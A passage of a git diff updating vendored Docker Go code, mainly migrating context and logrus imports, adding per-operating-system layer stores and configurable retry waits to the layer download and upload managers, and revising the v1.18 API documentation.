+		repoInfo: repoInfo,
+		layer: &storeLayer{
+			Layer: layer.EmptyLayer,
+		},
+		repo:              repo,
+		v2MetadataService: ms,
+		pushState: &pushState{
+			remoteLayers: make(map[layer.DiffID]distribution.Descriptor),
+			hasAuthInfo:  false,
+		},
+		checkedDigests: make(map[digest.Digest]struct{}),
+	}
+	pd.Upload(context.Background(), &progressSink{t})
+	if removeMetadata {
+		t.Fatalf("expect remove not be called but called")
+	}
+}
+
 func taggedMetadata(key string, dgst string, sourceRepo string) metadata.V2Metadata {
 	meta := metadata.V2Metadata{
 		Digest:           digest.Digest(dgst),
@@ -476,7 +637,7 @@ type mockRepo struct {
 
 var _ distribution.Repository = &mockRepo{}
 
-func (m *mockRepo) Named() distreference.Named {
+func (m *mockRepo) Named() reference.Named {
 	m.t.Fatalf("Named() not implemented")
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/distribution/registry.go b/vendor/github.com/docker/docker/distribution/registry.go
index 95e181ded8..8b46aaad6d 100644
--- a/vendor/github.com/docker/docker/distribution/registry.go
+++ b/vendor/github.com/docker/docker/distribution/registry.go
@@ -1,6 +1,7 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"fmt"
 	"net"
 	"net/http"
@@ -8,7 +9,7 @@ import (
 
 	"github.com/docker/distribution"
 	"github.com/docker/distribution/manifest/schema2"
-	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/distribution/registry/client"
 	"github.com/docker/distribution/registry/client/auth"
 	"github.com/docker/distribution/registry/client/transport"
@@ -16,7 +17,6 @@ import (
 	"github.com/docker/docker/dockerversion"
 	"github.com/docker/docker/registry"
 	"github.com/docker/go-connections/sockets"
-	"golang.org/x/net/context"
 )
 
 // ImageTypes represents the schema2 config types for images
@@ -55,10 +55,10 @@ func init() {
 // providing timeout settings and authentication support, and also verifies the
 // remote API version.
 func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, endpoint registry.APIEndpoint, metaHeaders http.Header, authConfig *types.AuthConfig, actions ...string) (repo distribution.Repository, foundVersion bool, err error) {
-	repoName := repoInfo.FullName()
+	repoName := repoInfo.Name.Name()
 	// If endpoint does not support CanonicalName, use the RemoteName instead
 	if endpoint.TrimHostname {
-		repoName = repoInfo.RemoteName()
+		repoName = reference.Path(repoInfo.Name)
 	}
 
 	direct := &net.Dialer{
@@ -82,7 +82,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end
 		base.Dial = proxyDialer.Dial
 	}
 
-	modifiers := registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), metaHeaders)
+	modifiers := registry.Headers(dockerversion.DockerUserAgent(ctx), metaHeaders)
 	authTransport := transport.NewTransport(base, modifiers...)
 
 	challengeManager, foundVersion, err := registry.PingV2Registry(endpoint.URL, authTransport)
@@ -122,7 +122,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end
 	}
 	tr := transport.NewTransport(base, modifiers...)
 
-	repoNameRef, err := distreference.ParseNamed(repoName)
+	repoNameRef, err := reference.WithName(repoName)
 	if err != nil {
 		return nil, foundVersion, fallbackError{
 			err:         err,
@@ -131,7 +131,7 @@ func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, end
 		}
 	}
 
-	repo, err = client.NewRepository(ctx, repoNameRef, endpoint.URL.String(), tr)
+	repo, err = client.NewRepository(repoNameRef, endpoint.URL.String(), tr)
 	if err != nil {
 		err = fallbackError{
 			err:         err,
diff --git a/vendor/github.com/docker/docker/distribution/registry_unit_test.go b/vendor/github.com/docker/docker/distribution/registry_unit_test.go
index 406de34915..5ae529d23d 100644
--- a/vendor/github.com/docker/docker/distribution/registry_unit_test.go
+++ b/vendor/github.com/docker/docker/distribution/registry_unit_test.go
@@ -1,20 +1,19 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"net/http"
 	"net/http/httptest"
 	"net/url"
-	"os"
+	"runtime"
 	"strings"
 	"testing"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
-	"github.com/docker/docker/utils"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 const secretRegistryToken = "mysecrettoken"
@@ -38,12 +37,6 @@ func (h *tokenPassThruHandler) ServeHTTP(w http.ResponseWriter, r *http.Request)
 }
 
 func testTokenPassThru(t *testing.T, ts *httptest.Server) {
-	tmp, err := utils.TestDirectory("")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmp)
-
 	uri, err := url.Parse(ts.URL)
 	if err != nil {
 		t.Fatalf("could not parse url from test server: %v", err)
@@ -56,11 +49,10 @@ func testTokenPassThru(t *testing.T, ts *httptest.Server) {
 		Official:     false,
 		TrimHostname: false,
 		TLSConfig:    nil,
-		//VersionHeader: "verheader",
 	}
-	n, _ := reference.ParseNamed("testremotename")
+	n, _ := reference.ParseNormalizedNamed("testremotename")
 	repoInfo := &registry.RepositoryInfo{
-		Named: n,
+		Name: n,
 		Index: &registrytypes.IndexInfo{
 			Name:     "testrepo",
 			Mirrors:  nil,
@@ -92,7 +84,7 @@ func testTokenPassThru(t *testing.T, ts *httptest.Server) {
 	logrus.Debug("About to pull")
 	// We expect it to fail, since we haven't mock'd the full registry exchange in our handler above
 	tag, _ := reference.WithTag(n, "tag_goes_here")
-	_ = p.pullV2Repository(ctx, tag)
+	_ = p.pullV2Repository(ctx, tag, runtime.GOOS)
 }
 
 func TestTokenPassThru(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/distribution/utils/progress.go b/vendor/github.com/docker/docker/distribution/utils/progress.go
index ef8ecc89f6..73ee2be61e 100644
--- a/vendor/github.com/docker/docker/distribution/utils/progress.go
+++ b/vendor/github.com/docker/docker/distribution/utils/progress.go
@@ -1,4 +1,4 @@
-package utils
+package utils // import "github.com/docker/docker/distribution/utils"
 
 import (
 	"io"
@@ -6,15 +6,15 @@ import (
 	"os"
 	"syscall"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/progress"
 	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/sirupsen/logrus"
 )
 
 // WriteDistributionProgress is a helper for writing progress from chan to JSON
 // stream with an optional cancel function.
 func WriteDistributionProgress(cancelFunc func(), outStream io.Writer, progressChan <-chan progress.Progress) {
-	progressOutput := streamformatter.NewJSONStreamFormatter().NewProgressOutput(outStream, false)
+	progressOutput := streamformatter.NewJSONProgressOutput(outStream, false)
 	operationCancelled := false
 
 	for prog := range progressChan {
diff --git a/vendor/github.com/docker/docker/distribution/xfer/download.go b/vendor/github.com/docker/docker/distribution/xfer/download.go
index 7545342212..e8cda93628 100644
--- a/vendor/github.com/docker/docker/distribution/xfer/download.go
+++ b/vendor/github.com/docker/docker/distribution/xfer/download.go
@@ -1,19 +1,21 @@
-package xfer
+package xfer // import "github.com/docker/docker/distribution/xfer"
 
 import (
+	"context"
 	"errors"
 	"fmt"
 	"io"
+	"runtime"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/progress"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
 )
 
 const maxDownloadAttempts = 5
@@ -22,21 +24,27 @@ const maxDownloadAttempts = 5
 // registers and downloads those, taking into account dependencies between
 // layers.
 type LayerDownloadManager struct {
-	layerStore layer.Store
-	tm         TransferManager
+	layerStores  map[string]layer.Store
+	tm           TransferManager
+	waitDuration time.Duration
 }
 
-// SetConcurrency set the max concurrent downloads for each pull
+// SetConcurrency sets the max concurrent downloads for each pull
 func (ldm *LayerDownloadManager) SetConcurrency(concurrency int) {
 	ldm.tm.SetConcurrency(concurrency)
 }
 
 // NewLayerDownloadManager returns a new LayerDownloadManager.
-func NewLayerDownloadManager(layerStore layer.Store, concurrencyLimit int) *LayerDownloadManager {
-	return &LayerDownloadManager{
-		layerStore: layerStore,
-		tm:         NewTransferManager(concurrencyLimit),
+func NewLayerDownloadManager(layerStores map[string]layer.Store, concurrencyLimit int, options ...func(*LayerDownloadManager)) *LayerDownloadManager {
+	manager := LayerDownloadManager{
+		layerStores:  layerStores,
+		tm:           NewTransferManager(concurrencyLimit),
+		waitDuration: time.Second,
+	}
+	for _, option := range options {
+		option(&manager)
 	}
+	return &manager
 }
 
 type downloadTransfer struct {
@@ -87,8 +95,8 @@ type DownloadDescriptorWithRegistered interface {
 // the layer store, and the key is not used by an in-progress download, the
 // Download method is called to get the layer tar data. Layers are then
 // registered in the appropriate order.  The caller must call the returned
-// release function once it is is done with the returned RootFS object.
-func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) {
+// release function once it is done with the returned RootFS object.
+func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) {
 	var (
 		topLayer       layer.Layer
 		topDownload    *downloadTransfer
@@ -98,6 +106,15 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima
 		downloadsByKey = make(map[string]*downloadTransfer)
 	)
 
+	// Assume that the operating system is the host OS if blank, and validate it
+	// to ensure we don't cause a panic by an invalid index into the layerstores.
+	if os == "" {
+		os = runtime.GOOS
+	}
+	if !system.IsOSSupported(os) {
+		return image.RootFS{}, nil, system.ErrNotSupportedOperatingSystem
+	}
+
 	rootFS := initialRootFS
 	for _, descriptor := range layers {
 		key := descriptor.Key()
@@ -109,17 +126,22 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima
 			if err == nil {
 				getRootFS := rootFS
 				getRootFS.Append(diffID)
-				l, err := ldm.layerStore.Get(getRootFS.ChainID())
+				l, err := ldm.layerStores[os].Get(getRootFS.ChainID())
 				if err == nil {
 					// Layer already exists.
 					logrus.Debugf("Layer already exists: %s", descriptor.ID())
 					progress.Update(progressOutput, descriptor.ID(), "Already exists")
 					if topLayer != nil {
-						layer.ReleaseAndLog(ldm.layerStore, topLayer)
+						layer.ReleaseAndLog(ldm.layerStores[os], topLayer)
 					}
 					topLayer = l
 					missingLayer = false
 					rootFS.Append(diffID)
+					// Register this repository as a source of this layer.
+					withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered)
+					if hasRegistered { // As layerstore may set the driver
+						withRegistered.Registered(diffID)
+					}
 					continue
 				}
 			}
@@ -129,7 +151,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima
 		// the stack? If so, avoid downloading it more than once.
 		var topDownloadUncasted Transfer
 		if existingDownload, ok := downloadsByKey[key]; ok {
-			xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload)
+			xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload, os)
 			defer topDownload.Transfer.Release(watcher)
 			topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput)
 			topDownload = topDownloadUncasted.(*downloadTransfer)
@@ -141,10 +163,10 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima
 
 		var xferFunc DoFunc
 		if topDownload != nil {
-			xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload)
+			xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload, os)
 			defer topDownload.Transfer.Release(watcher)
 		} else {
-			xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil)
+			xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil, os)
 		}
 		topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput)
 		topDownload = topDownloadUncasted.(*downloadTransfer)
@@ -154,7 +176,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima
 	if topDownload == nil {
 		return rootFS, func() {
 			if topLayer != nil {
-				layer.ReleaseAndLog(ldm.layerStore, topLayer)
+				layer.ReleaseAndLog(ldm.layerStores[os], topLayer)
 			}
 		}, nil
 	}
@@ -165,7 +187,7 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima
 
 	defer func() {
 		if topLayer != nil {
-			layer.ReleaseAndLog(ldm.layerStore, topLayer)
+			layer.ReleaseAndLog(ldm.layerStores[os], topLayer)
 		}
 	}()
 
@@ -201,11 +223,11 @@ func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS ima
 // complete before the registration step, and registers the downloaded data
 // on top of parentDownload's resulting layer. Otherwise, it registers the
 // layer on top of the ChainID given by parentLayer.
-func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer) DoFunc {
+func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer, os string) DoFunc {
 	return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
 		d := &downloadTransfer{
 			Transfer:   NewTransfer(),
-			layerStore: ldm.layerStore,
+			layerStore: ldm.layerStores[os],
 		}
 
 		go func() {
@@ -269,7 +291,7 @@ func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor,
 
 				logrus.Errorf("Download failed, retrying: %v", err)
 				delay := retries * 5
-				ticker := time.NewTicker(time.Second)
+				ticker := time.NewTicker(ldm.waitDuration)
 
 			selectLoop:
 				for {
@@ -365,11 +387,11 @@ func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor,
 // parentDownload. This function does not log progress output because it would
 // interfere with the progress reporting for sourceDownload, which has the same
 // Key.
-func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer) DoFunc {
+func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer, os string) DoFunc {
 	return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer {
 		d := &downloadTransfer{
 			Transfer:   NewTransfer(),
-			layerStore: ldm.layerStore,
+			layerStore: ldm.layerStores[os],
 		}
 
 		go func() {
diff --git a/vendor/github.com/docker/docker/distribution/xfer/download_test.go b/vendor/github.com/docker/docker/distribution/xfer/download_test.go
index bc20e1e7ec..4ab3705af6 100644
--- a/vendor/github.com/docker/docker/distribution/xfer/download_test.go
+++ b/vendor/github.com/docker/docker/distribution/xfer/download_test.go
@@ -1,7 +1,8 @@
-package xfer
+package xfer // import "github.com/docker/docker/distribution/xfer"
 
 import (
 	"bytes"
+	"context"
 	"errors"
 	"fmt"
 	"io"
@@ -12,11 +13,10 @@ import (
 	"time"
 
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/progress"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
 )
 
 const maxDownloadConcurrency = 3
@@ -26,6 +26,7 @@ type mockLayer struct {
 	diffID    layer.DiffID
 	chainID   layer.ChainID
 	parent    layer.Layer
+	os        string
 }
 
 func (ml *mockLayer) TarStream() (io.ReadCloser, error) {
@@ -126,7 +127,7 @@ func (ls *mockLayerStore) Get(chainID layer.ChainID) (layer.Layer, error) {
 func (ls *mockLayerStore) Release(l layer.Layer) ([]layer.Metadata, error) {
 	return []layer.Metadata{}, nil
 }
-func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, string, layer.MountInit, map[string]string) (layer.RWLayer, error) {
+func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, *layer.CreateRWLayerOpts) (layer.RWLayer, error) {
 	return nil, errors.New("not implemented")
 }
 
@@ -265,8 +266,11 @@ func TestSuccessfulDownload(t *testing.T) {
 	if runtime.GOOS == "windows" {
 		t.Skip("Needs fixing on Windows")
 	}
+
 	layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)}
-	ldm := NewLayerDownloadManager(layerStore, maxDownloadConcurrency)
+	lsMap := make(map[string]layer.Store)
+	lsMap[runtime.GOOS] = layerStore
+	ldm := NewLayerDownloadManager(lsMap, maxDownloadConcurrency, func(m *LayerDownloadManager) { m.waitDuration = time.Millisecond })
 
 	progressChan := make(chan progress.Progress)
 	progressDone := make(chan struct{})
@@ -291,7 +295,7 @@ func TestSuccessfulDownload(t *testing.T) {
 	}
 	firstDescriptor.diffID = l.DiffID()
 
-	rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan))
+	rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), runtime.GOOS, descriptors, progress.ChanOutput(progressChan))
 	if err != nil {
 		t.Fatalf("download error: %v", err)
 	}
@@ -327,8 +331,10 @@ func TestSuccessfulDownload(t *testing.T) {
 }
 
 func TestCancelledDownload(t *testing.T) {
-	ldm := NewLayerDownloadManager(&mockLayerStore{make(map[layer.ChainID]*mockLayer)}, maxDownloadConcurrency)
-
+	layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)}
+	lsMap := make(map[string]layer.Store)
+	lsMap[runtime.GOOS] = layerStore
+	ldm := NewLayerDownloadManager(lsMap, maxDownloadConcurrency, func(m *LayerDownloadManager) { m.waitDuration = time.Millisecond })
 	progressChan := make(chan progress.Progress)
 	progressDone := make(chan struct{})
 
@@ -346,7 +352,7 @@ func TestCancelledDownload(t *testing.T) {
 	}()
 
 	descriptors := downloadDescriptors(nil)
-	_, _, err := ldm.Download(ctx, *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan))
+	_, _, err := ldm.Download(ctx, *image.NewRootFS(), runtime.GOOS, descriptors, progress.ChanOutput(progressChan))
 	if err != context.Canceled {
 		t.Fatal("expected download to be cancelled")
 	}
diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer.go b/vendor/github.com/docker/docker/distribution/xfer/transfer.go
index 14f15660ac..c356fde8d3 100644
--- a/vendor/github.com/docker/docker/distribution/xfer/transfer.go
+++ b/vendor/github.com/docker/docker/distribution/xfer/transfer.go
@@ -1,11 +1,11 @@
-package xfer
+package xfer // import "github.com/docker/docker/distribution/xfer"
 
 import (
+	"context"
 	"runtime"
 	"sync"
 
 	"github.com/docker/docker/pkg/progress"
-	"golang.org/x/net/context"
 )
 
 // DoNotRetry is an error wrapper indicating that the error cannot be resolved
@@ -300,7 +300,7 @@ func NewTransferManager(concurrencyLimit int) TransferManager {
 	}
 }
 
-// SetConcurrency set the concurrencyLimit
+// SetConcurrency sets the concurrencyLimit
 func (tm *transferManager) SetConcurrency(concurrency int) {
 	tm.mu.Lock()
 	tm.concurrencyLimit = concurrency
diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go
index 6c50ce3524..a86e27959e 100644
--- a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go
+++ b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go
@@ -1,4 +1,4 @@
-package xfer
+package xfer // import "github.com/docker/docker/distribution/xfer"
 
 import (
 	"sync/atomic"
diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload.go b/vendor/github.com/docker/docker/distribution/xfer/upload.go
index ad3398369c..33b45ad747 100644
--- a/vendor/github.com/docker/docker/distribution/xfer/upload.go
+++ b/vendor/github.com/docker/docker/distribution/xfer/upload.go
@@ -1,14 +1,14 @@
-package xfer
+package xfer // import "github.com/docker/docker/distribution/xfer"
 
 import (
+	"context"
 	"errors"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/progress"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 const maxUploadAttempts = 5
@@ -16,19 +16,25 @@ const maxUploadAttempts = 5
 // LayerUploadManager provides task management and progress reporting for
 // uploads.
 type LayerUploadManager struct {
-	tm TransferManager
+	tm           TransferManager
+	waitDuration time.Duration
 }
 
-// SetConcurrency set the max concurrent uploads for each push
+// SetConcurrency sets the max concurrent uploads for each push
 func (lum *LayerUploadManager) SetConcurrency(concurrency int) {
 	lum.tm.SetConcurrency(concurrency)
 }
 
 // NewLayerUploadManager returns a new LayerUploadManager.
-func NewLayerUploadManager(concurrencyLimit int) *LayerUploadManager {
-	return &LayerUploadManager{
-		tm: NewTransferManager(concurrencyLimit),
+func NewLayerUploadManager(concurrencyLimit int, options ...func(*LayerUploadManager)) *LayerUploadManager {
+	manager := LayerUploadManager{
+		tm:           NewTransferManager(concurrencyLimit),
+		waitDuration: time.Second,
 	}
+	for _, option := range options {
+		option(&manager)
+	}
+	return &manager
 }
 
 type uploadTransfer struct {
@@ -142,7 +148,7 @@ func (lum *LayerUploadManager) makeUploadFunc(descriptor UploadDescriptor) DoFun
 
 				logrus.Errorf("Upload failed, retrying: %v", err)
 				delay := retries * 5
-				ticker := time.NewTicker(time.Second)
+				ticker := time.NewTicker(lum.waitDuration)
 
 			selectLoop:
 				for {
diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go
index 16bd187336..4507feac7b 100644
--- a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go
+++ b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go
@@ -1,6 +1,7 @@
-package xfer
+package xfer // import "github.com/docker/docker/distribution/xfer"
 
 import (
+	"context"
 	"errors"
 	"sync/atomic"
 	"testing"
@@ -9,7 +10,6 @@ import (
 	"github.com/docker/distribution"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/progress"
-	"golang.org/x/net/context"
 )
 
 const maxUploadConcurrency = 3
@@ -79,7 +79,7 @@ func uploadDescriptors(currentUploads *int32) []UploadDescriptor {
 }
 
 func TestSuccessfulUpload(t *testing.T) {
-	lum := NewLayerUploadManager(maxUploadConcurrency)
+	lum := NewLayerUploadManager(maxUploadConcurrency, func(m *LayerUploadManager) { m.waitDuration = time.Millisecond })
 
 	progressChan := make(chan progress.Progress)
 	progressDone := make(chan struct{})
@@ -105,7 +105,7 @@ func TestSuccessfulUpload(t *testing.T) {
 }
 
 func TestCancelledUpload(t *testing.T) {
-	lum := NewLayerUploadManager(maxUploadConcurrency)
+	lum := NewLayerUploadManager(maxUploadConcurrency, func(m *LayerUploadManager) { m.waitDuration = time.Millisecond })
 
 	progressChan := make(chan progress.Progress)
 	progressDone := make(chan struct{})
diff --git a/vendor/github.com/docker/docker/dockerversion/useragent.go b/vendor/github.com/docker/docker/dockerversion/useragent.go
index d2a891c4d6..2eceb6fa9e 100644
--- a/vendor/github.com/docker/docker/dockerversion/useragent.go
+++ b/vendor/github.com/docker/docker/dockerversion/useragent.go
@@ -1,15 +1,17 @@
-package dockerversion
+package dockerversion // import "github.com/docker/docker/dockerversion"
 
 import (
+	"context"
 	"fmt"
 	"runtime"
 
-	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/pkg/parsers/kernel"
 	"github.com/docker/docker/pkg/useragent"
-	"golang.org/x/net/context"
 )
 
+// UAStringKey is used as key type for user-agent string in net/context struct
+const UAStringKey = "upstream-user-agent"
+
 // DockerUserAgent is the User-Agent the Docker client uses to identify itself.
 // In accordance with RFC 7231 (5.5.3) is of the form:
 //    [docker client's UA] UpstreamClient([upstream client's UA])
@@ -37,9 +39,9 @@ func DockerUserAgent(ctx context.Context) string {
 func getUserAgentFromContext(ctx context.Context) string {
 	var upstreamUA string
 	if ctx != nil {
-		var ki interface{} = ctx.Value(httputils.UAStringKey)
+		var ki interface{} = ctx.Value(UAStringKey)
 		if ki != nil {
-			upstreamUA = ctx.Value(httputils.UAStringKey).(string)
+			upstreamUA = ctx.Value(UAStringKey).(string)
 		}
 	}
 	return upstreamUA
@@ -50,8 +52,8 @@ func escapeStr(s string, charsToEscape string) string {
 	var ret string
 	for _, currRune := range s {
 		appended := false
-		for _, escapeableRune := range charsToEscape {
-			if currRune == escapeableRune {
+		for _, escapableRune := range charsToEscape {
+			if currRune == escapableRune {
 				ret += `\` + string(currRune)
 				appended = true
 				break
diff --git a/vendor/github.com/docker/docker/dockerversion/version_lib.go b/vendor/github.com/docker/docker/dockerversion/version_lib.go
index 33f77d3ce6..0897c0728e 100644
--- a/vendor/github.com/docker/docker/dockerversion/version_lib.go
+++ b/vendor/github.com/docker/docker/dockerversion/version_lib.go
@@ -1,16 +1,17 @@
 // +build !autogen
 
 // Package dockerversion is auto-generated at build-time
-package dockerversion
+package dockerversion // import "github.com/docker/docker/dockerversion"
 
 // Default build-time variable for library-import.
 // This file is overridden on build with build-time informations.
 const (
-	GitCommit          string = "library-import"
-	Version            string = "library-import"
-	BuildTime          string = "library-import"
-	IAmStatic          string = "library-import"
-	ContainerdCommitID string = "library-import"
-	RuncCommitID       string = "library-import"
-	InitCommitID       string = "library-import"
+	GitCommit          = "library-import"
+	Version            = "library-import"
+	BuildTime          = "library-import"
+	IAmStatic          = "library-import"
+	ContainerdCommitID = "library-import"
+	RuncCommitID       = "library-import"
+	InitCommitID       = "library-import"
+	PlatformName       = ""
 )
diff --git a/vendor/github.com/docker/docker/docs/README.md b/vendor/github.com/docker/docker/docs/README.md
deleted file mode 100644
index da93093075..0000000000
--- a/vendor/github.com/docker/docker/docs/README.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# The non-reference docs have been moved!
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-The documentation for Docker Engine has been merged into
-[the general documentation repo](https://github.com/docker/docker.github.io).
-
-See the [README](https://github.com/docker/docker.github.io/blob/master/README.md)
-for instructions on contributing to and building the documentation.
-
-If you'd like to edit the current published version of the Engine docs,
-do it in the master branch here:
-https://github.com/docker/docker.github.io/tree/master/engine
-
-If you need to document the functionality of an upcoming Engine release,
-use the `vnext-engine` branch:
-https://github.com/docker/docker.github.io/tree/vnext-engine/engine
-
-The reference docs have been left in docker/docker (this repo), which remains
-the place to edit them.
-
-The docs in the general repo are open-source and we appreciate
-your feedback and pull requests!
diff --git a/vendor/github.com/docker/docker/docs/api/v1.18.md b/vendor/github.com/docker/docker/docs/api/v1.18.md
index 0db0c0f916..327701427a 100644
--- a/vendor/github.com/docker/docker/docs/api/v1.18.md
+++ b/vendor/github.com/docker/docker/docs/api/v1.18.md
@@ -7,8 +7,8 @@ redirect_from:
 - /reference/api/docker_remote_api_v1.18/
 ---
 
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
+<!-- This file is maintained within the moby/moby GitHub
+     repository at https://github.com/moby/moby/. Make all
      pull requests against that repo. If you see this file in
      another repository, consider it read-only there, as it will
      periodically be overwritten by the definitive file. Pull
@@ -21,8 +21,15 @@ redirect_from:
  - The daemon listens on `unix:///var/run/docker.sock` but you can
    [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket).
  - The API tends to be REST, but for some complex commands, like `attach`
-   or `pull`, the HTTP connection is hijacked to transport `STDOUT`,
-   `STDIN` and `STDERR`.
+   or `pull`, the HTTP connection is hijacked to transport `stdout`,
+   `stdin` and `stderr`.
+ - A `Content-Length` header should be present in `POST` requests to endpoints
+   that expect a body.
+ - To lock to a specific version of the API, you prefix the URL with the version
+   of the API to use. For example, `/v1.18/info`. If no version is included in
+   the URL, the maximum supported API version is used.
+ - If the API version specified in the URL is not supported by the daemon, a HTTP
+   `400 Bad Request` error message is returned.
 
 ## 2. Endpoints
 
@@ -131,6 +138,7 @@ Create a container
 
     POST /v1.18/containers/create HTTP/1.1
     Content-Type: application/json
+    Content-Length: 12345
 
     {
            "Hostname": "",
@@ -232,11 +240,11 @@ Create a container
 -   **ExposedPorts** - An object mapping ports to an empty object in the form of:
       `"ExposedPorts": { "<port>/<tcp|udp>: {}" }`
 -   **HostConfig**
-    -   **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms:
+    -   **Binds** – A list of bind mounts for this container. Each item is a string in one of these forms:
            + `host-src:container-dest` to bind-mount a host path into the
              container. Both `host-src`, and `container-dest` must be an
              _absolute_ path.
-           + `host-src:container-dest:ro` to make the bind-mount read-only
+           + `host-src:container-dest:ro` to make the bind mount read-only
              inside the container. Both `host-src`, and `container-dest` must be
              an _absolute_ path.
     -   **Links** - A list of links for the container. Each link entry should be
@@ -256,8 +264,14 @@ Create a container
           should map to. A JSON object in the form
           `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
           Take note that `port` is specified as a string and not an integer value.
-    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+    -   **PublishAllPorts** - Allocates an ephemeral host port for all of a container's
           exposed ports. Specified as a boolean value.
+
+          Ports are de-allocated when the container stops and allocated when the container starts.
+          The allocated port might be changed when restarting the container.
+
+          The port is selected from the ephemeral port range that depends on the kernel.
+          For example, on Linux the range is defined by `/proc/sys/net/ipv4/ip_local_port_range`.
     -   **Privileged** - Gives the container full access to the host. Specified as
           a boolean value.
     -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
